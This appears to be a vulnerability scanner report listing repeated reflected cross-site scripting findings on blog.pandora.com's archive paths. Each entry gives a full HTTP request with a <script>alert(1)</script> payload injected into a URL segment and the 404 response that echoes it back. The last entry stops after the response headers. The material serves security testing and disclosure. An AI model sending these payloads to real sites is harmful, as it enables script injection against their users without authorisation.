The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)</script>6f5884afdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)</script>573c7e0b3bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)</script>859bb1e33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)</script>14a7a2da08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)</script>1648ab9c938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a36c6<script>alert(1)</script>9fa19fe371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 346 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32ddc<script>alert(1)</script>3ce6ddf7419 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b372a<script>alert(1)</script>0ef2d728dc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35554<script>alert(1)</script>d313a9d9657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload efc2f<script>alert(1)</script>d3dbd7d1589 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 682e0<script>alert(1)</script>d4489f6734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c214<script>alert(1)</script>b8b28cef3de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40eea<script>alert(1)</script>4daafa849f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ee6f<script>alert(1)</script>47d2dc5e8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947a8<script>alert(1)</script>db5c6120320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>31ac4934856 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8487c<script>alert(1)</script>81afb429dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 351 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0986<script>alert(1)</script>4df760a3378 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a5b3<script>alert(1)</script>d9de8f83c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5c1c<script>alert(1)</script>f85b07012ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
